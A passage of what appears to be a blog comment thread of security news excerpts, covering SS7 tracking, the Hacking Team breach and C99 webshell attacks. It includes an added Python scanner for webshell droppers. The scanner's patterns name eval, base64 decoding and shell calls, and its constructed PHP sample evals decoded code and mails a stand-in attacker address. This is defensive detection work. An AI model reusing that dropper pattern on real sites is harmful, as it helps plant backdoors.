    Karsten Nohl: The congressman has been in California, more specifically the L.A. area, zoom in here a little bit, Torrance.

    The SS7 network is the heart of the worldwide mobile phone system. Phone companies use SS7 to exchange billing information. Billions of calls and text messages travel through its arteries daily. It is also the network that allows phones to roam.

    Sharyn Alfonsi: Are you able to track his movements even if he moves the location services and turns that off?

    Karsten Nohl: Yes. The mobile network independent from the little GPS chip in your phone, knows where you are. So any choices that a congressman could’ve made, choosing a phone, choosing a pin number, installing or not installing certain apps, have no influence over what we are showing because this is targeting the mobile network. That of course, is not controlled by any one customer.

    Karsten Nohl and his team were legally granted access to SS7 by several international cellphone carriers. In exchange, the carriers wanted Nohl to test the network’s vulnerability to attack. That’s because criminals have proven they can get into SS7.

    Karsten Nohl: Mobile networks are the only place in which this problem can be solved. There is no global policing of SS7. Each mobile network has to move– to protect their customers on their networks. And that is hard.

    “We live in a world where we cannot trust the technology that we use.”

    Nohl told us the SS7 flaw is a significant risk mostly to political leaders and business executives whose private communications could be of high value to hackers. The ability to intercept cellphone calls through the SS7 network is an open secret among the world’s intelligence agencies — including ours — and they don’t necessarily want that hole plugged.

    Reply
  40. Tomi Engdahl says:

    US-CERT advice says kill Quicktime for Windows, quickly
    Unsupported software with known bugs has no place anywhere
    http://www.theregister.co.uk/2016/04/18/uscert_advises_quicktime_deletion/

    US-CERT has echoed The Register’s advice to the effect that if you’re running Quicktime for Windows, it’s time to delete it. Right now.

    The United States’ Department of Homeland Security’s Computer Emergency Response Team’s advice comes after Apple took Quicktime for Windows for its long drive down a country road.

    As noted by Trend Micro at the time, that leaves a couple of wonderful bugs – ZDI-16-241 and ZDI-16-242 – to live forever.

    Reply
  41. Tomi Engdahl says:

    Google punts freebie DDoS shield to hacks, human rights worthies
    Reverse proxying traffic might save headaches
    http://www.theregister.co.uk/2016/02/25/google_freebie_ddos_shield/

    Google has launched a free service to protect news websites against DDoS attacks.

    Project Shield will also be offered to human rights and election monitoring websites as a way of fending off increasingly commonplace site-swamping DDoS assaults. Google is offering to “reverse proxy” qualifying websites’ traffic through Google’s cloud platform. Publishers can opt in to route all their traffic through Google by making changes in their DNS settings.

    Google has promised not to use log info in order to serve advertising. The advantage for publishers is that a successful attack would effectively have to be strong enough to destabilize Google’s cloud instead of simply knocking over a WordPress installation, a much easier proposition for attackers.

    One disadvantage is that sites would become inaccessible from countries that block all Google IP addresses. In many such cases, the sites might be censored anyway, and reachable only through VPNs or Tor. Publishers would also have to put their faith in Google and its security.

    Project Shield
    https://jigsaw.google.com/products/project-shield/

    Every day, independent news, human rights, and election monitoring sites around the world are taken offline and silenced by attacks on their servers. Project Shield uses Google’s technology to protect websites at risk and keep them online.

    Protecting websites from digital attacks
    Background

    A distributed denial of service attack (DDoS) is a type of digital attack where a hacker exploits thousands, or even millions, of computers and tricks them into visiting a website at the same time. The resulting flood of traffic often overwhelms servers and the website goes offline.

    Independent news sites, election monitors, and human rights groups often don’t have the resources to protect themselves from attacks, which makes them an easy target for people who want to censor free expression.

    Project Shield uses technology called a reverse proxy, which allows a webmaster to serve their site through Google infrastructure for free, providing a “shield” against would-be attackers. So far we’ve protected hundreds of news organizations and human rights websites that have faced attacks aimed at censoring free expression. By protecting these sites, we’ve helped to keep vital information online during elections, major crises and conflicts.

    Reply
  42. Tomi Engdahl says:

    EU Approves Strict New Privacy Rules
    https://slashdot.org/story/16/04/17/0022208/eu-approves-strict-new-privacy-rules

    The EU just approved a new set of strict rules governing privacy and data protection, which include a right to be forgotten and to “clear and affirmative consent” for any processing of private data, as well as the right to know when data has been compromised. Culminating more than four years of work, “The reform will replace the current data protection directive, dating back to 1995 when the internet was still in its infancy,” the EU said in a statement

    Data protection reform – Parliament approves new rules fit for the digital era
    http://www.europarl.europa.eu/news/en/news-room/20160407IPR21776/Data-protection-reform-Parliament-approves-new-rules-fit-for-the-digital-era

    New EU data protection rules which aim to give citizens back control of their personal data and create a high, uniform level of data protection across the EU fit for the digital era were given their final approval by MEPs on Thursday. The reform also sets minimum standards on use of data for policing and judicial purposes.

    “The regulation will also create clarity for businesses by establishing a single law across the EU. The new law creates confidence, legal certainty and fairer competition”, he added.

    The new rules include provisions on:

    a right to be forgotten,
    “clear and affirmative consent” to the processing of private data by the person concerned,
    a right to transfer your data to another service provider,
    the right to know when your data has been hacked,
    ensuring that privacy policies are explained in clear and understandable language, and
    stronger enforcement and fines up to 4% of firms’ total worldwide annual turnover, as a deterrent to breaking the rules.

    New rules on data transfers to ensure smoother police cooperation

    The data protection package also includes a directive on data transfers for policing and judicial purposes. It will apply to data transfers across borders within the EU as well as, for the first time, setting minimum standards for data processing for policing purposes within each member state.

    Next steps

    The regulation will enter into force 20 days after its publication in the EU Official Journal. Its provisions will be directly applicable in all member states two years after this date.

    Member states will have two years to transpose the provisions of the directive into national law.

    Reply
  43. Tomi Engdahl says:

    Hacker’s Account of How He Took Down Hacking Team’s Servers
    https://it.slashdot.org/story/16/04/17/1616237/hackers-account-of-how-he-took-down-hacking-teams-servers

    FinFisher, the hacker that broke into Italian firm Hacking Team, has published a step-by-step account of how he carried out the attacks, what tools he used, and what he learned from scouting HackingTeam’s network. Published on PasteBin, the attack’s timeline reveals he entered their network through a zero-day exploit in an (unnamed) embedded device, accessed a MongoDB database that had no password, discovered backups in the database, found a BES admin password in the backups, and eventually got admin access to the Windows Domain Server. From here, it was easy to reach into their email server and steal all the company’s emails, and later access Git repos and steal the source code of their surveillance software.

    Hacking Team Hacked, Attackers Grab 400GB of Internal Data
    https://it.slashdot.org/story/15/07/06/1228240/hacking-team-hacked-attackers-grab-400gb-of-internal-data

    Phineas Fisher’s Account of How He Broke Into Hacking Team Servers
    http://news.softpedia.com/news/finfisher-s-account-of-how-he-broke-into-hackingteam-servers-503078.shtml#ixzz46AVGUjmL

    Almost a year after carrying out his attacks, the hacker behind the Hacking Team data breach has published a step-by-step explainer on how he breached the company’s servers and stole all their data.

    Known as Phineas Fisher (past moniker FinFisher), the hacker posted a PasteBin over the weekend, in which he reveals how the attack unfolded, the tools he used, and provided a tutorial for h@ckZ0r wannabees who want to enter the world of top-level hacking.

    “Zero-day exploit in an embedded device was initial entry point”

    The hacker revealed that the entry point into Hacking Team’s infrastructure was a zero-day root exploit in an embedded device deployed inside the company’s corporate network. He declined to name the exact nature and purpose of the embedded device.

    Phineas Fisher says he spent a lot of time scanning the company’s network and even exposed a vulnerability in the Hacking Team’s Joomla-based frontend website, discovered issues with their email server, a couple of routers, and some VPN appliances. Despite the large attack surface, he concluded that the zero-day exploit he identified was much more reliable for further attacks.

    After writing and deploying a backdoored firmware to the vulnerable embedded device, he then waited, listening to internal traffic, scanning and mapping the local infrastructure.

    “MongoDB databases left without authentication strike again!”

    “Hacker discovers secret network where the RCS source code was hosted”

    After reading some of the stolen emails, Phineas Fisher understood that there was another hidden network inside the company’s infrastructure, where the Hacking Team kept the source code of their RCS (Remote Control System) surveillance software.

    HackBack
    http://pastebin.com/raw/0SNSvyjJ

    Reply
  44. Tomi Engdahl says:

    Security This Week: Tax Day Is Near, and the IRS Is as Hackable as Ever
    http://www.wired.com/2016/04/security-week-tax-day-near-irs-hackable-ever/

    There’s rarely a boring moment in the security world.

    a former journalist, Matthew Keys, was sentenced to two years in jail for aiding Anonymous hackers who briefly defaced a headline on the LA Times website

    Then the world learned that the US government paid “grey hat” hackers for information about an iOS 9 software vulnerability, which the feds then used to access the locked iPhone that belonged to a San Bernardino terrorist.

    URL shorteners are actually opening themselves up to malware attacks and online spying

    It’s Tax Time, But the IRS Still Sucks at Cybersecurity

    IRS Chief John Koskinen admitted Tuesday that unless the agency is given permission to pay digital security professionals more than the currently approved salary rates, those much-needed experts will take jobs elsewhere.

    Security technologist Bruce Schneier noted this week that the annual Government Accountability Office report on the state of IRS security outlines 43 recommendations for fundamental improvements to IRS security. This is a big deal because of how sensitive taxpayer data is—cybercriminals can easily use it to commit serious fraud.

    But taxpayers shouldn’t only worry about the IRS’ own lax security. Ars Technica reported this week that millions of Americans have received fraudulent robocalls from scammers outside the United States claiming to be the IRS.

    The White House Has a Brand New Cybersecurity Commission

    Reply
  45. Tomi Engdahl says:

    The Philippines election hack is ‘freaking huge’
    http://www.wired.co.uk/news/archive/2016-04/14/philippines-data-breach-fingerprint-data

    A massive data breach in the Philippines appears to contain millions of fingerprint records, despite officials claiming the leak “doesn’t include biometrics”. But one fingerprint specialist has questioned how useful the leaked data would be to criminals.

    Earlier this month security researchers uncovered what appears to be the largest ever government data breach, affecting 55 million voters in the Philippines. The data, which has been widely distributed on both the dark and clear web, comprises 228,605 email addresses; 1.3 million passport numbers and expiry dates of overseas Filipino voters; and 15.8 million fingerprint records.

    “If you lose a password you can change it,” security expert Troy Hunt told WIRED. “You can’t change a fingerprint. Short of using a belt sander, it’s not going to be much fun.”

    Five fields in the main 338GB database obtained by hackers relate to fingerprint data

    But the biometric data may be utterly useless without access to a computer system that can interpret it, fingerprint expert Chris Johnson told WIRED. “Very often the computer systems developed for countries are bespoke,”

    When stored digitally, fingerprint data is typically converted into a unique code relating to the patterns known as minutiae. Computer software measures the distance and angle between a series of points, creating a unique map of the print. This code can then be matched whenever that finger is scanned again. The Philippines started collecting voter fingerprint data in 2015

    “If you lose a password you can change it. You can’t change a fingerprint”
    Troy Hunt, Security expert

    Reply
  46. Tomi Engdahl says:

    Idiot millennials are saving credit card PINs on their mobile phones
    Cleartext passwords are bad, kids, mmmkay?
    http://www.theregister.co.uk/2016/04/18/storing_passwords_smartphone_bad_mkay/

    More than one in five 18-24 year olds (21 per cent) store PINs for credit or debit cards on their smartphones, tablets or laptops, according to research conducted by Equifax in conjunction with Gorkana.

    In the same survey of 500 people across all ages, more than a third of young adults (38 per cent) said they also use their personal devices to store online passwords.

    The habit leaves young adults more exposed to online scams in cases where their devices are stolen or hacked.

    Once a device is breached, fraudsters can use data stored on it to access accounts, and also use a combination of data found to try to steal an individual’s identity.

    Reply
  47. Tomi Engdahl says:

    Ancient apps leave 3.2 million PCs open to ransomware attacks
    It mostly affects schools, but fixes are thankfully on the way.
    http://www.engadget.com/2016/04/16/jboss-ransomware-exploit/

    Criminals are relying on some particularly insidious ways to spread ransomware. Cisco’s Talos group has discovered that intruders are taking advantage of vulnerabilities in old versions of Follett library management software (specifically, the associated JBoss web servers) to install backdoors and slip in ransom code. The attack has ‘only’ put 2,100 backdoors in place, but about 3.2 million systems are known to be at risk — many of them at grade schools. Suffice it to say that many educators don’t want to pay a hefty sum just to regain access to their library data.

    Reply
  48. Tomi Engdahl says:

    C99 Webshell Increasingly Used in WordPress Attacks
    http://www.securityweek.com/c99-webshell-increasingly-used-wordpress-attacks

    IBM Security has warned WordPress website administrators about a sharp increase in the number of attacks leveraging a variant of a PHP webshell called C99.

    IBM reported spotting nearly 1,000 attacks in February and March, which represents a 45 percent increase compared to the previous period. The C99 variant used in these attacks is currently detected by 37 security products based on its signature.

    The attack starts with a file named pagat.txt, which contains an obfuscated PHP script, being uploaded to the targeted website. By obfuscating the script, cybercriminals hope to increase its chances of evading detection and bypassing Web application firewalls.

    Once the script is decoded and executed on the victim’s server, an email is sent to the attacker, informing them that the target has been compromised.

    The attacker can then access the webshell from a browser and start executing shell commands on the server. The webshell also allows malicious actors to upload files that can be used to perform various actions.

    A Google search shows that the pagat.txt file is currently present on hundreds of websites. However, only 9 of 68 security products on VirusTotal detected the script as being malicious.

    Webshells are typically uploaded to WordPress websites via vulnerabilities in the content management system (CMS) or third-party plugins

    Reply
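As an added example, not IBM’s detection logic or any vendor’s signature: a Python heuristic that scores files under a WordPress tree for the traits the excerpt describes (a PHP open tag inside a .txt upload, eval() of base64-decoded code, a mail() call home) and flags a constructed pagat.txt-style sample while a normal contact form stays below threshold. The indicator list, weights, threshold and sample files are assumptions built for illustration.

```python
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Constructed heuristic scanner, added here to illustrate hunting for droppers
# like pagat.txt in a WordPress tree. Indicators, weights and the threshold are
# assumptions, not IBM's or any vendor's signature; the samples are constructed.

# (pattern, weight, label): constructs a file in wp-content/uploads has no need for
INDICATORS = [
    (re.compile(r"\beval\s*\(", re.I), 3, "eval()"),
    (re.compile(r"\bbase64_decode\s*\(", re.I), 2, "base64_decode()"),
    (re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2, "decoder call"),
    (re.compile(r"\b(system|shell_exec|passthru|popen|proc_open)\s*\(", re.I), 3, "shell call"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"), 1, "request parameter"),
    (re.compile(r"\bmail\s*\("), 1, "mail()"),
    (re.compile(r"[A-Za-z0-9+/=]{200,}"), 2, "long base64-like blob"),
]
# Extensions in which a PHP open tag is itself a red flag
NON_PHP_SUFFIXES = {".txt", ".jpg", ".jpeg", ".png", ".gif", ".ico"}
DEFAULT_THRESHOLD = 5


def scan_text(text: str, suffix: str) -> Tuple[int, List[str]]:
    """Score one file's contents; a higher score is more webshell-like."""
    score, reasons = 0, []
    if "<?php" in text and suffix in NON_PHP_SUFFIXES:
        score += 3
        reasons.append(f"PHP open tag inside a {suffix} file")
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):
            score += weight
            reasons.append(label)
    return score, reasons


def scan_tree(root: Path, threshold: int = DEFAULT_THRESHOLD) -> List[dict]:
    """Walk a directory and return the files whose score reaches the threshold."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        score, reasons = scan_text(text, path.suffix.lower())
        if score >= threshold:
            findings.append({"path": str(path.relative_to(root)), "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed samples: a dropper-style file, a legitimate contact form, a plain note.
SAMPLE_DROPPER = (
    "<?php\n"
    "$p = base64_decode('ZWNobyAneCc7');  // decodes to: echo 'x';  (placeholder payload)\n"
    "eval($p);\n"
    "mail('attacker@example.invalid', 'new host', 'installed');\n"
)
SAMPLE_CONTACT_FORM = (
    "<?php\n"
    "if (isset($_POST['msg'])) { mail('ops@example.invalid', 'Contact', $_POST['msg']); }\n"
)
SAMPLE_NOTE = "Uploads directory. Do not edit by hand.\n"


def demo() -> List[dict]:
    """Write the samples into a temporary WordPress-style tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "wp-content" / "uploads" / "pagat.txt").write_text(SAMPLE_DROPPER)
        (root / "wp-content" / "contact.php").write_text(SAMPLE_CONTACT_FORM)
        (root / "wp-content" / "uploads" / "README.txt").write_text(SAMPLE_NOTE)
        return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['path']}: score {finding['score']} ({', '.join(finding['reasons'])})")
```

A scanner like this complements, rather than replaces, signature-based products: it is tuned for the combination of traits rather than one string, which is exactly what obfuscation is meant to defeat.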
  49. Tomi Engdahl says:

    Microsoft Details Security Responsibilities for Azure Cloud Customers
    http://www.securityweek.com/microsoft-details-security-responsibilities-azure-cloud-customers

    Microsoft Publishes White Papers on Incident Response and Shared Responsibility for Azure Cloud Customers

    Incident response is a hot topic. The cloud is a hot topic. But how do you respond to incidents in the cloud of which you may have no knowledge? It’s a difficult issue that could cause problematic relations between enterprises and the big clouds like Microsoft Azure, Amazon Web Services (AWS) and Google.

    Now Microsoft is setting the ground rules with two new documents: Shared Responsibilities for Cloud Computing, and Microsoft Azure Security Response in the Cloud.

    The first specifies Microsoft’s view of its own responsibilities (and therefore, by omission, the enterprise CISO’s responsibilities); while the second gives an outline of how Microsoft will actually respond.

    Microsoft believes that there is a fairly fundamental split in responsibility. The cloud provider is responsible for the physical aspects of the cloud IT infrastructure and the software that it provides. The customer is responsible for its own data.

    It sounds simple, but there will inevitably be problems. Forensic proof will become important. If a customer’s data is modified via a flaw in Microsoft software that Microsoft doesn’t recognize, there could be issues.

    This is where the CISO needs to understand both documents – because there are some incidents that Microsoft will not report to the customer.

    And as every CISO knows, visibility into the cloud is not always 20/20.

    Having suggested that Microsoft’s definition of its and its customers’ responsibilities could cause operational difficulties, the remainder of the Incident management document is informative and valuable. It first outlines the roles that should be involved in a response, and then describes the plan itself.

    The plan itself involves five stages: Detect, Assess, Diagnose, Stabilize, and Close.

    Reply
  50. Tomi Engdahl says:

    Ensuring network cyber security
    http://www.controleng.com/single-article/ensuring-network-cyber-security/795ff533f8c4d3713399e2e49a5f8197.html

    Good cyber security requires understanding network risks, threats, and the technical safeguards that can prevent unwanted plant data intrusions.

    “What’s the worst that could happen?” This question is at the heart of many plantwide discussions. Deliberations on safety interlocks, alarm rationalization, hazard analyses, job safety plans, and process equipment design routinely center on this premise. Why, then, do some facilities have a lackadaisical approach to the layout and protection of their network security?

    Reply
